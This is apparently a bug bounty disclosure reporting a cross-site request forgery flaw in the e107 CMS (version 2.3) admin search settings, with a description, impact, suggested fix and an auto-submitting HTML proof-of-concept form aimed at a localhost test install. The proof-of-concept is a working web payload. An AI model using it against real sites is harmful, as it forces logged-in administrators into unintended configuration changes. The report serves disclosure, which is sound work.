Cross-Site Request Forgery (CSRF) in e107inc/e107
Valid
Reported on
Sep 13th 2021
✍️ Description
Attacker or malicious user is able to change search setting if a logged in user visits attacker website. because lack of CSRF token
🕵️♂️ Proof of Concept
1.when you logged in open this POC.html in a browser
2.you can check unintentionally some settings changed
//POC.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://localhost:8181/ecms-full/e107_admin/search.php" method="POST">
<input type="hidden" name="core_handlers[comments][class]" value="252" />
<input type="hidden" name="core_handlers[comments][order]" value="2" />
<input type="hidden" name="core_handlers[users][class]" value="0" />
<input type="hidden" name="core_handlers[users][order]" value="3" />
<input type="hidden" name="plug_handlers[news][class]" value="0" />
<input type="hidden" name="plug_handlers[news][order]" value="1" />
<input type="hidden" name="plug_handlers[page][class]" value="0" />
<input type="hidden" name="plug_handlers[page][order]" value="1" />
<input type="hidden" name="plug_handlers[user][class]" value="0" />
<input type="hidden" name="plug_handlers[user][order]" value="1" />
<input type="hidden" name="google" value="0" />
<input type="hidden" name="comments_handlers[news][class]" value="0" />
<input type="hidden" name="update_main" value="no-value" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
💥 Impact
This vulnerability is capable of forcing user to unintentional change search settings
💥 Test
Tested version is 2.3 on Firefox and safari.
💥 Fix
You should set a CSRF token on this requeset.
References
We have contacted a member of the
e107inc/e107
team and are waiting to hear back
2 years ago
to join this conversation